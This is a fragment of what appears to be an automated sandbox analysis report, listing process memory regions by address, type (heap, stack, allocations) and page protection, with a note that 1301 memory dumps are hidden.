5A4F000
|
stack
|
page read and write
|
||
|
22CC0AB6000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
1EF27370000
|
heap
|
page read and write
|
||
|
4B08000
|
trusted library allocation
|
page read and write
|
||
|
22CC0C12000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
24AE1000
|
direct allocation
|
page execute and read and write
|
||
|
1270000
|
heap
|
page read and write
|
||
|
22CC0CC9000
|
heap
|
page read and write
|
||
|
8980000
|
trusted library allocation
|
page execute and read and write
|
||
|
9CA31FE000
|
stack
|
page read and write
|
||
|
2465B000
|
heap
|
page read and write
|
||
|
22CC0B0F000
|
heap
|
page read and write
|
||
|
22CC0C34000
|
heap
|
page read and write
|
||
|
23ECE000
|
stack
|
page read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
3200000
|
direct allocation
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
DF0000
|
unkown
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
1584000
|
system
|
page execute and read and write
|
||
|
3275000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
22CBECA5000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
1B4C5C10000
|
heap
|
page read and write
|
||
|
DB1000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
9080000
|
direct allocation
|
page execute and read and write
|
||
|
22CC0ACB000
|
heap
|
page read and write
|
||
|
22CC0A9B000
|
heap
|
page read and write
|
||
|
1540000
|
unkown
|
page readonly
|
||
|
22CC0A99000
|
heap
|
page read and write
|
||
|
22CC0B04000
|
heap
|
page read and write
|
||
|
96C000
|
stack
|
page read and write
|
||
|
22CC0B04000
|
heap
|
page read and write
|
||
|
5B8F000
|
stack
|
page read and write
|
||
|
8A8A000
|
heap
|
page read and write
|
||
|
DB3000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0CFB000
|
heap
|
page read and write
|
||
|
7FFD34951000
|
trusted library allocation
|
page read and write
|
||
|
835E000
|
stack
|
page read and write
|
||
|
22CC0E7A000
|
heap
|
page read and write
|
||
|
1B4C5BF0000
|
heap
|
page read and write
|
||
|
88F0000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF41800000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
7110000
|
direct allocation
|
page read and write
|
||
|
B04E000
|
direct allocation
|
page execute and read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
24784000
|
heap
|
page read and write
|
||
|
CB0000
|
unkown
|
page readonly
|
||
|
3541000
|
heap
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1EF298CC000
|
trusted library allocation
|
page read and write
|
||
|
1740000
|
unkown
|
page readonly
|
||
|
8627000
|
heap
|
page read and write
|
||
|
22CC0BE1000
|
heap
|
page read and write
|
||
|
22CC0A71000
|
heap
|
page read and write
|
||
|
57BC000
|
stack
|
page read and write
|
||
|
7FFD347A4000
|
trusted library allocation
|
page read and write
|
||
|
1EF28DB0000
|
heap
|
page execute and read and write
|
||
|
1587000
|
system
|
page execute and read and write
|
||
|
3C02000
|
unclassified section
|
page read and write
|
||
|
897C000
|
heap
|
page read and write
|
||
|
7443000
|
heap
|
page read and write
|
||
|
22CC0AB7000
|
heap
|
page read and write
|
||
|
34EB000
|
heap
|
page read and write
|
||
|
8973000
|
heap
|
page read and write
|
||
|
244A0000
|
heap
|
page read and write
|
||
|
22CC0CB4000
|
heap
|
page read and write
|
||
|
22CC0A99000
|
heap
|
page read and write
|
||
|
7FFD34B30000
|
trusted library allocation
|
page read and write
|
||
|
1230000
|
unkown
|
page readonly
|
||
|
CA0000
|
unkown
|
page readonly
|
||
|
1EF2988C000
|
trusted library allocation
|
page read and write
|
||
|
2EAD000
|
heap
|
page read and write
|
||
|
22CC0BD9000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0CDE000
|
heap
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
7F0E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0720000
|
heap
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
1EF2A9ED000
|
trusted library allocation
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
23A40000
|
direct allocation
|
page read and write
|
||
|
53D5000
|
trusted library allocation
|
page read and write
|
||
|
59B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page execute and read and write
|
||
|
28DF000
|
unkown
|
page read and write
|
||
|
1EF390DA000
|
trusted library allocation
|
page read and write
|
||
|
8312000
|
heap
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
85E0000
|
heap
|
page read and write
|
||
|
22CBECB1000
|
heap
|
page read and write
|
||
|
14A1000
|
unkown
|
page readonly
|
||
|
70E0000
|
direct allocation
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
885D000
|
stack
|
page read and write
|
||
|
123A000
|
stack
|
page read and write
|
||
|
745D000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
1CEEC050000
|
heap
|
page read and write
|
||
|
2FCB000
|
stack
|
page read and write
|
||
|
8A77000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
22CC0C43000
|
heap
|
page read and write
|
||
|
22CC0A70000
|
heap
|
page read and write
|
||
|
14D0000
|
unkown
|
page readonly
|
||
|
9CA32FE000
|
stack
|
page read and write
|
||
|
6F90000
|
direct allocation
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
22CC0C0D000
|
heap
|
page read and write
|
||
|
3294000
|
heap
|
page read and write
|
||
|
22CC0D0B000
|
heap
|
page read and write
|
||
|
3541000
|
heap
|
page read and write
|
||
|
6F50000
|
direct allocation
|
page read and write
|
||
|
22CC0D39000
|
heap
|
page read and write
|
||
|
22CC0C3B000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
There are 1301 hidden memdumps, click here to show them.